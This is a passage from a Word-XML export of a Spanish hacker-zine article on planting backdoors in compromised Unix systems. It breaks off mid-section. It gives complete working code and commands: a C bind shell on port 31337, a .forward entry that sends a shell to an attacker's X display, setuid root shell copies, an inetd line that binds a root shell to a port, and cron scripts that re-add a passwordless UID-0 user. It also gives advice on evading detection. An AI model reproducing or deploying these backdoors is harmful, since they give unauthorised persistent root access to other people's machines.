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color w:val="333399"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="es-ES_tradnl"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:i/>
          <w:color w:val="333399"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="es-ES_tradnl"/>
        </w:rPr>
        <w:t>BackDoors</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:b/>
          <w:i/>
          <w:i/>
          <w:color w:val="333399"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="es-ES_tradnl"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:i/>
          <w:color w:val="333399"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="es-ES_tradnl"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:b/>
          <w:color w:val="D60000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="es-ES_tradnl"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="es-ES_tradnl"/>
        </w:rPr>
        <w:t>Autor:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"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b/>
          <w:color w:val="D60000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="es-ES_tradnl"/>
        </w:rPr>
        <w:t>Fuego Fatuo (La KaTeDral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lang w:val="es-ES_tradnl"/>
        </w:rPr>
        <w:t>Bajado desde :</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="D60000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="es-ES_tradnl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  <w:lang w:val="es-ES_tradnl"/>
          </w:rPr>
          <w:t>www.softdownload.com.ar</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="D6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Este texto es una adaptacion/traduccion del articulo 'BackDoors Revised'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publicado en la Confidence Remains High n.3 escrito por Blk-Majik (Menuo nick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XDDDD ). He añadido algunas backdoors, he modificao otras y he kitao otras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Osea, ke este texto tambien tiene algo mi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Utiliza este texto de manera responsable: Osea, ke te sirva pa asegurar algun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hack :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Introducion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  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="es-ES_tradnl"/>
        </w:rPr>
        <w:t>COMO? , si esperas ke me enrolle a escribir, la llevas clara .... No m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gusta escribir, asiske ...., si tienes 'alguna' duda me escribes, si no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entiendes casi na, olvidalo tio.... (Ke RADIKAL XDDDD)</w:t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Ke es una backdoor?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  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="es-ES_tradnl"/>
        </w:rPr>
        <w:t>Puessss,....., es una 'Puerta trasera' ke sirve pa volver a entrar a una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makina hackeada en caso de ke te kiten el acceso normal, tb se le llama asi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a lo ke dejas en una makina para asegurarte el root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  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="es-ES_tradnl"/>
        </w:rPr>
        <w:t>Una cosa debe estar clara, a~adir un usuario con :0:0: es de lamers, ya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ke se detecta como na!,y no solo por el root, tb por otro hacker (yo h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encontrao :0:0: SIN PASSWORD!!! Algun lamer .. )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  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="es-ES_tradnl"/>
        </w:rPr>
        <w:t>He de reconocer ke yo tengo una cta asi (pero kon pass), pero porke nadi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aparece por esa makina desde hace a~os, osea ke no me preocupa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Ke necesito pa poner una backdoor?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es-ES_tradnl"/>
        </w:rPr>
        <w:t>Una makina donde ponerla (osea login y pass), de momento, con esto solo t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basta pa poner alguna backdoor, tb es verdad ke kon eso ... poco mas k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komerte los mocos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es-ES_tradnl"/>
        </w:rPr>
        <w:t>Nene!!, trabaja un poco y conviertete en root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es-ES_tradnl"/>
        </w:rPr>
        <w:t>*Por cierto, por si no te habias dao cuenta, me refiero a backdoors para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sistemas basados en UNIX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Bien, veamos esas backdoors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es-ES_tradnl"/>
        </w:rPr>
        <w:t>1- Pa poner esta backdoor, con solo ser un simple usuario basta, consist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en un simple programita en C, ke al ejecutarlo se keda ejecutando en segundo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plano residente, este programita es un servidor, e.d. atiende un puerto,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cuando alguien se conesta a ese puerto,el servidor atiende a ese 'alguien',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ejecuta una shell y deja ke ese alguien interactue (los gurus  de linux m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mataran al ver komo explico esto) con esa shell, osea, komo si estuviera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dentro, eso si, sin dejar logs (esto es bueno),una cosa ke no debeis olvidar,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es poner al final de cada linea un ';' (no voy a explicar porque)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         </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="es-ES_tradnl"/>
        </w:rPr>
        <w:t>Pa ke lo entiendas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                </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="es-ES_tradnl"/>
        </w:rPr>
        <w:t>cat /etc/passwd  -pasa a ser-   cat /etc/passwd;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Se ejecuta el comando y depues dara un error,  pasa de el, komo yo paso d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vosotros ..... ( Y MAS, Y MAS, Y MAS RADIKAL XDDDDD. ME RULO!!!!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    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="es-ES_tradnl"/>
        </w:rPr>
        <w:t>Evidentemente, esta backdoor no es muy recomendable ya ke se ve con un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simple 'ps', ademas, cuando el servidor ejecuta la shell lo hace como akel k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ha ejecutao el programa, osea ke si  pones esta backdoor sin ser root, solo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te aseguras el acceso como usuario, bueno ... algo es alg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El programa en cuestion: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&lt;++&gt; set_017/backdoors/back1.c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/* quick thingy... bind a shell to a socket... defaults to port 31337 */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/* code by pluvius@io.org                                             */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/* don't forget.. when you connect to the port.. commands are like:   */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/* "ls -l;" or "exit;" (don't forget the ';')                         */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#define PORT 31337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#include &lt;stdio.h&gt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#include &lt;signal.h&gt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#include &lt;sys/types.h&gt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#include &lt;sys/socket.h&gt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#include &lt;netinet/in.h&gt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int soc_des, soc_cli, soc_rc, soc_len, server_pid, cli_pid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fr-F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truct sockaddr_in serv_addr; struct sockaddr_in client_addr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nt main ()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>{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oc_des = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)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f (soc_des == -1) exit(-1)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bzero((char *) &amp;serv_addr, sizeof(serv_addr))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erv_addr.sin_family = AF_INET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erv_addr.sin_addr.s_addr = htonl(INADDR_ANY)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serv_addr.sin_port = htons(PORT)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fr-F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oc_rc = bind(soc_des, (struct sockaddr *) &amp;serv_addr, sizeof(serv_addr))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f (soc_rc != 0) exit(-1)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f (fork() != 0)  exit(0)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etpgrp()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ignal(SIGHUP, SIG_IGN)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f (fork() != 0) exit(0)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oc_rc = listen(soc_des, 5)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f (soc_rc != 0) exit(0)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while (1)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{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soc_len = sizeof(client_addr);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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>soc_cli = accept(soc_des, (struct sockaddr *) &amp;client_addr,&amp;soc_len);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  <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">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if (soc_cli &lt; 0) exit(0)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cli_pid = getpid()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server_pid = fork()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if (server_pid != 0)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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>{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eastAsia="Arial" w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>dup2(soc_cli,0)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eastAsia="Arial" w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>dup2(soc_cli,1);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  <w:lang w:val="fr-FR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dup2(soc_cli,2)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execl("/bin/sh","sh",(char *)0)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close(soc_cli)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>exit(0)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}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>close(soc_cli);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}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}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&lt;--&gt;</w:t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s-ES_tradnl"/>
        </w:rPr>
        <w:t>*NOTA:  Pa los pocos espabilados: Para  ke no te vean el programa al primer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ps ke haga alguien ponle un nombre que no resalte musso, como 'bash','chfn'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o algo asi ..., vamos, no le pongas 'mi_backdoor'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ab/>
        <w:tab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es-ES_tradnl"/>
        </w:rPr>
        <w:t>Mejoras:  lo malo de esta backdoor es ke kualkiera ke haga telnet ha es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puerto entrara, la mejora puede ser  ke pida un password exclusivo (osea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ke no este en el /etc/passwd) y asi solo tu podras entrar por ese puerto. Si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alguien tiene la ocurrencia de hacerlo, por favor, ke me lo mande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es-ES_tradnl"/>
        </w:rPr>
        <w:t>2- .forward, Esta backdoor es mu chuli, con esta te aseguras el acceso,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consiste en modificar el .forward de un usuario (si es el root cojonudo ya k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entrarias como root), el .foward es un fichero ke usa el mail, cuando es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usuario reciba algun mail hara lo ke el .forward ponga ke tiene ke hacer,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responder , ejecutar comandos, etc .... }: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   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="es-ES_tradnl"/>
        </w:rPr>
        <w:t>Osea, cuando este en una makina pon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echo \username &gt;&gt; ~/.forward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echo  |"/usr/local/X11/bin/xterm -display hacksys.other.dom:0.0 -e /bin/sh"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&gt;&gt;~/.forward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Esto te abrira una ventana  de X-windows, pero antes debes de poner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'xhost +victima.gov' en un makina para permitir ke se te abra una ventana en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tu sistema desde victima.gov. Por supuesto debes de estar en X-windows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(por si acaso ...)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Ten en cuenta, de ke si mandas correo asi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ab/>
        <w:t>mail tontodelculo@victima.gov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Tardara un tiempo en llegar, por lo tanto tardara un tiempo en ejecutarse lo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ke pongas en el .forward, para solventar este problema, haz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ab/>
        <w:t>telnet victima.gov 25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ab/>
        <w:t>HELO kojones.net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  <w:lang w:val="es-ES_tradnl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MAIL FROM: tutankamon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>RCPT TO: usernam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s-ES_tradnl"/>
        </w:rPr>
        <w:t>DATA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ab/>
        <w:t>Hola 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ab/>
        <w:t>Soy Edu, Feliz Navidad!!!!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ab/>
        <w:t>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ab/>
        <w:t>QUIT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Y ya esta ... asi le llegara el mail casi instantaneamente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es-ES_tradnl"/>
        </w:rPr>
        <w:t>La verdad es ke hay mejores opciones, ya ke esto lo ejecutaria cada vez k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ese usuario recibiera mail, bueno, tu eres el encargado de aprovechar esta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backdoor. Tambien recuerda en borrar el mail kuando entres o simplemente no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mandarle un mail sospechoso para ke no sospeche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es-ES_tradnl"/>
        </w:rPr>
        <w:t>Otra cosa ...... si no tienes IP fija lo anterior de la xterm no te servira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ye ke cada vez tendras una IP distinta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es-ES_tradnl"/>
        </w:rPr>
        <w:t>A partir de ahora,para poner las siguientes backdoors, debes de ser root,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:( asiske ya sabeis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es-ES_tradnl"/>
        </w:rPr>
        <w:t>3- Un sushi, esto es una backdoor para mantener el root, pero para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conseguirlo una vez dentro, osea, es copiar una shell (por ejemplo /bin/sh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con un nombre ke no llame la atencion y como root ponerle los permisos 4755,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es decir, ke cualkiera pueda ejecutar esa shell  con los permisos del root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osea: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>#cp /bin/sh /bin/fwalld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s-ES_tradnl"/>
        </w:rPr>
        <w:t>#chmod 4755 /bin/fwalld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es-ES_tradnl"/>
        </w:rPr>
        <w:t>Si como un usuario normal ejecutas /bin/fwalld .. :) . Lo malo del sushi es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ke si otro lo encuentra y  lo ejecuta tambien se hace root, esto se pued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mejorar poniendo un sushi seguro, esto es, un programa ke te pide password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antes de ejecutar el shell. Aki muestro uno ke he hecho yo, pero, lo pongo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solo pa ke veas como es no para ke lo copies,lo subas y ya tienes backdoor,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porque para eso te subes otras backdoors mejores ke hay (rootkits por ejemplo),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pongo el programa para ke lo veas (si lo kieres usar usalo, a mi me da igual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y aprendas ha hacer uno (se hace en 3min.) para ponertelo, osea, si no tienes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tiempo para ponerte a instalar un rootkit  vas con el 'vi' mismo escribes el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programa lo compilas (recuerda: chmod 4711 &lt;programa&gt;) y lo dejas alli para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cuando tengas tiempo de instalar el rootkit u otra backdoor mejor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es-ES_tradnl"/>
        </w:rPr>
        <w:t>Es importante ke sepas programar en C en este mundillo, asiske si no sabes,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deja de poner backdoors  y estudia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El codigo fuente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&lt;++&gt; set_017/backdoors/sushi.c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/* Sushi Seguro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s-ES_tradnl"/>
        </w:rPr>
        <w:t>* por Fuego Fatuo (La KaTeDral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s-ES_tradnl"/>
        </w:rPr>
        <w:t>*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s-ES_tradnl"/>
        </w:rPr>
        <w:t>* El programa se puede  mejorar encriptando el password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s-ES_tradnl"/>
        </w:rPr>
        <w:t>* yo personalmente notengo ninguna gana de molestarme,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s-ES_tradnl"/>
        </w:rPr>
        <w:t>* si alguien desea hacerlo, por favor,que me mande una copia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>*/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#include &lt;stdio.h&gt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#include &lt;stdlib.h&gt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#define secret_passwd "mipass12\0"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main (void)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{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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>char *key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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>key =(char *)(getpass ("Password:"))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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>if (!strcmp(key,secret_passwd))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{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>setuid(0)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>setgid(0)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>seteuid(0)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>setegid(0)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>system("/bin/sh");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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="es-ES_tradnl"/>
        </w:rPr>
        <w:t>}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es-ES_tradnl"/>
        </w:rPr>
        <w:t>}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&lt;--&gt;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Compila el programa, dale permisos 4711 y ya esta, no hace falta ke copies la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shell. Por supuesto el programa se puede mejorar de mil maneras, si t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molestas en hacerlo, mandame una copia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4- Inetd. Esta es una de las mas usadas (SI NO LA KE MAS....)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Un POCO de explicacion previa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es-ES_tradnl"/>
        </w:rPr>
        <w:t>El inetd es un 'programilla' ke escucha los puertos de una makina, entonses,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cuando alguien conesta a un puerto determinao, el inetd ejecuta el demonio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asociao a ese puerto. Bien lo primero: abre un puerto, pa esto esta el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fichero /etc/services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ok, en el /etc/services vas a ver algo asi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tcpmux            1/tcp    #TCP Port Service Multiplexer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tcpmux            1/udp    #TCP Port Service Multiplexer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compressnet       2/tcp    #Management Utility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compressnet       2/udp    #Management Utility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compressnet       3/tcp    #Compression Process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compressnet       3/udp    #Compression Process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fr-F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Ke cojones es esto?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fr-F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ftp              21/tcp    #File Transfer [Control]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[1]             [2]/[3]    #[         4           ]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es-ES_tradnl"/>
        </w:rPr>
        <w:t>1: Nombre del servicio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es-ES_tradnl"/>
        </w:rPr>
        <w:t>2: Puerto ke usa el sistema pa ese servicio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es-ES_tradnl"/>
        </w:rPr>
        <w:t>3: El protocolo, puede ser tcp o udp, nosotros pondremos el tcp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es-ES_tradnl"/>
        </w:rPr>
        <w:t>4: Descripcion de lo ke hase ese servicio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Bien, eso kiere decir ke esta abierto el puerto 21, y le ha dao el nombr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de ftp. Pos nosotros a~adiremos otra linea mas o menos del mismo estilo, pa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abrir el puerto, el numero/nombre del servicio no debe llamar la atencion,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fijate, ke el numero/nombre del puerto no este ya en us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Un puerto ke por ejemplo no se suele usar es el 26, bien pongamos algo asi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fwalld</w:t>
        <w:tab/>
        <w:t xml:space="preserve">  26/tcp</w:t>
        <w:tab/>
        <w:t xml:space="preserve">  #Firewall daemon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Ahora, tenemos ke konfigurar el inetd pa ke ejecute una shell cuando alguien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se coneste a ese puerto. Esto se hace en el fichero /etc/inetd.conf , antes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de na, hechemosle un vistazo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Veras algo asi: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ftp     stream  tcp     nowait  root    /usr/libexec/tcpd       ftpd -l -A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elnet  stream  tcp     nowait  root    /usr/libexec/tcpd       telnetd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hell   stream  tcp     nowait  root    /usr/libexec/tcpd       rshd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ogin   stream  tcp     nowait  root    /usr/libexec/tcpd       rlogind -a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exec    stream  tcp     nowait  root    /usr/libexec/tcpd       rexecd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Que significa esto?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ftp     stream  tcp     nowait  root    /usr/libexec/tcpd       ftpd -l -A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[1]     [  2  ] [3]     [  4 ]  [ 5 ]   [      6         ]      [    7    ]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es-ES_tradnl"/>
        </w:rPr>
        <w:t>1: Nombre del servicio en el /etc/services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es-ES_tradnl"/>
        </w:rPr>
        <w:t>2: Tipo de conexion ke utiliza el servicio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es-ES_tradnl"/>
        </w:rPr>
        <w:t>3: Protocolo. Siempre es TCP o UDP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es-ES_tradnl"/>
        </w:rPr>
        <w:t>4: Cuanto tiempo se tiene ke retrasar la conexion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es-ES_tradnl"/>
        </w:rPr>
        <w:t>5: Usuario kon el ke se ejecuta el demonio (se usa para los permisos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    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="es-ES_tradnl"/>
        </w:rPr>
        <w:t>uid/gid etc ...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es-ES_tradnl"/>
        </w:rPr>
        <w:t>6: Ke programa va a mantener la conexion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es-ES_tradnl"/>
        </w:rPr>
        <w:t>7: Comando o demonio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es-ES_tradnl"/>
        </w:rPr>
        <w:t>Ok, osea que, segun la linea anterior, Cuando alguien haga un telnet al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puerto 21 de esta makina,va a tener una conexion stream/tcp y no va a esperar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nada. Ademas, el usuario, como root, va a ejecutar sobre /usr/libexec/tcpd el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comando ftpd (demonio de FTP en este caso)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es-ES_tradnl"/>
        </w:rPr>
        <w:t>Ya ke sabemos lo ke significa esto, instalemos lo ke nos falta de nuestra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backdoor, haber .... keremos ke kuando konectemos al puerto 26 se ejecute un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shell, osea /bin/sh no?, vale, estamos deacuerdo, ademas, no keremos k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espere nada, osea, ke nos deje entrar nada mas conectar, por supuesto, la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shell la tiene ke ejecutar como root si no, pierde casi toda la gracia, lo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ultimo es ver el tipo de conexion, pues es stream/tcp, si eres un poco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'curiosillo' (Cosa muy importante en esta 'profesion' :) te preguntaras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por que?, pos no te lo voy a decir (porque no lo se :), pero bueno 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tu hazme caso y ya esta, si alguien me kiere escribir para explicarmelo, s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lo agradeceria mucho. Bueno, dejemosnos de rollo, la linea es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fwalld     stream/tcp    nowait root  /bin/sh sh -i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es-ES_tradnl"/>
        </w:rPr>
        <w:t>Esta linea la meteis por enmedio del /etc/inetd.conf y no canta muss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es-ES_tradnl"/>
        </w:rPr>
        <w:t>Ahora reseteais el inetd pa ke koja los 'educativos' cambios. :) . Esto lo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haceis asi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ab/>
        <w:t>#killall -1 inetd=20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ab/>
        <w:t>o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ab/>
        <w:t># ps ax|grep inetd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ab/>
        <w:t>{mira el pid del inetd}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ab/>
        <w:t>#kill -9 pid_del_inetd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ab/>
        <w:t>#inetd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Haz ps y asegurate ke se ha reiniciado, ya ke lo ke haces es matar el inetd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(nadie se podra conectar) y despues volverlo a ejecutar. Pos ya ta!!! Ya ta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instalada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Ahora probad la backdoor accediendo como usuario normal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ab/>
        <w:t>$telnet localhost 26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ab/>
        <w:t>#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Mejoras para esta backdoor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  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="es-ES_tradnl"/>
        </w:rPr>
        <w:t>Lo malo de esta backdoor, es ke kualkier otro puede hacer telnet a es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puerto y entrar como root, ya ke no existe password, bueno ...., puedes poner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que se ejecute, en vez de una shell, un demonio creado por ti y ke pida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password (el kual solo lo sabras tu). Otra posibilidad es ke, en vez d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ejecutar /bin/sh, pongas un sushi como el del aparatado anterior y entonces,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no resaltara tanto ya ke no pondra el /bin/sh, (Mi 'sushi seguro' no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funciona en este caso), la verdad es ke tampoco hace falta ke sea un sushi,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kon ke solo copies el shell basta, no hace falta ke le des permisos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especiales. La linea kedaria  asi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fwalld</w:t>
        <w:tab/>
        <w:t>stream/tcp       nowait    root   /bin/fwalld fwalld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Ya resalta menos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Si alguien realiza un servidor ke pida un password exclusivo (sin ke este en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el /etc/passwd y sin modificar el login) antes de ejecutar una shell ke me lo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mande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5 - CRONos  I,  el root del tiempo XDDDDD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es-ES_tradnl"/>
        </w:rPr>
        <w:t>Los troyanos del cron son buenos para mantener el acceso como root en un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sistema si el administrador legal (o otro 'no legal' :) nos kita el acces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es-ES_tradnl"/>
        </w:rPr>
        <w:t>El Cron es un demonio 'temporal', osea, se encarga de hacer ke el sistema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ejecute la orden ke tu kieras kuando kieras :). Escribe crontab en el shell,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entonces te mostrara como introducir, ejecutar y kitar crons. El fichero d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configuracion es  /var/spool/cron/crontabs/root (no en todos los sistemas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esta ahi, pero bueno... molestate en buscarlo)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Asi es como es el fichero de configuracion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s-ES_tradnl"/>
        </w:rPr>
        <w:t>0       0       *       *       1       /usr/bin/updatedb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[1]     [2]     [3]     [4]     [5]     [       6         ]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es-ES_tradnl"/>
        </w:rPr>
        <w:t>1: minuto, 0-59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es-ES_tradnl"/>
        </w:rPr>
        <w:t>2: hora, 0-23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es-ES_tradnl"/>
        </w:rPr>
        <w:t>3: dia del mes, 1-31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es-ES_tradnl"/>
        </w:rPr>
        <w:t>4: mes del a=F1o, 1-12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es-ES_tradnl"/>
        </w:rPr>
        <w:t>5: dia de la semana, 0-6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es-ES_tradnl"/>
        </w:rPr>
        <w:t>6: comando a ejecutar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Este cron se ejecutara todos los lunes a las 00:00. Para modificar el Cron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para ke haga algo 'educativo'  solo tienes ke a~adir una linea en el fichero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/var/spool/crontab/root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Por ejemplo, si, para simplificar tus accesos metes un usuario de UID 0 en el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/etc/passwd, puedes meter un cron ke compruebe si el administrador (el legal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o no) ha kitado ese usuario ke usabas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Por ejemplo, lo programas para ke se ejecute todos los sabados a las 00:00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(asi puedes acceder a ese sistema durante el fin de semana). Esto se hac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a~adiendo al /var/spool/crontab/root la line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0       0       *       *       5       /usr/bin/revive.sh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es-ES_tradnl"/>
        </w:rPr>
        <w:t>Copia este programa en el directorio /usr/bin (o donde kieras), recuerda en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cambiarle el nombre para ke no kante mucho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revive.sh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---------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&lt;++&gt; set_017/backdoors/revive.sh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#!/bin/sh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#Is YourUser still on the system?  Let's make sure he is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#daemon9@netcom.com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et evilflag = (`grep YourUser /etc/passwd`)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f($#evilflag == 0) then                                # Is he there?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set linecount = `wc -l /etc/passwd`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cd                                      # Do this at home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cp /etc/passwd ./temppass               # Safety first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@ linecount[1] /= 2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@ linecount[1] += 1                     # we only want 2 temp files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split -$linecount[1] ./temppass         # passwd string option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echo "YourUser::0:0:Mr. Hacker:/home/hacker:/bin/csh" &gt;&gt; ./xaa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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>cat ./xab &gt;&gt; ./xaa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eastAsia="Arial" w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>mv ./xaa /etc/passwd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  <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">  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chmod 644 /etc/passwd                   # or whatever it was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                          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#beforehand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rm ./xa* ./temppass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echo Done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else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endif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&lt;--&gt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*** NOTE : MODIFY "YOURUSER" !!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Este programa chekea si esta nuestro usuario en el fichero de password, si no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esta, lo vuelve a meter sin password. Por favor, no seas tan lamer de dejarlo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sin password, ke he visto a mas de uno asi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Otra posibilidad es ke ponga un sushi cada cierto tiempo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dead.sh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-------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&lt;++&gt; set_017/backdoors/dead.sh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#!/bin/sh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# Everyone's favorite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cp /bin/csh /tmp/.yourlittleshell      # Don't name it that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chmod 4755 /tmp/.yourlittleshell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&lt;--&gt;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Mejoras: Usa tu imaginacion, hay MILLONES de posibilidades, te muestro ahora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otro CRON cojonudo,pero el Cron, no tiene limites :)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6- CRONos II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Este Cron, para mi, es uno de los mejores,  lo ke hace es, kopiar el fichero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de password y despues poner como fichero de password otro personal durante un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corto espacio de tiempo (1 minuto por ejemplo), asi, solo tu podras entrar a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la hora ke lo pongas, las 4:30 de la madrugada es buena hora (ATENCION!!! ten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en cuenta ke me refiero 4:30 hora de donde este la makina, ke lo mas posibl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es ke si estas hackeando fuera de Espa~a ,cosa ke deberias hacer, la hora no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sea la misma, enterate de la diferencia horaria, con el comando time ves la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hora de alli). Bueno aki pongo el cron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       </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="es-ES_tradnl"/>
        </w:rPr>
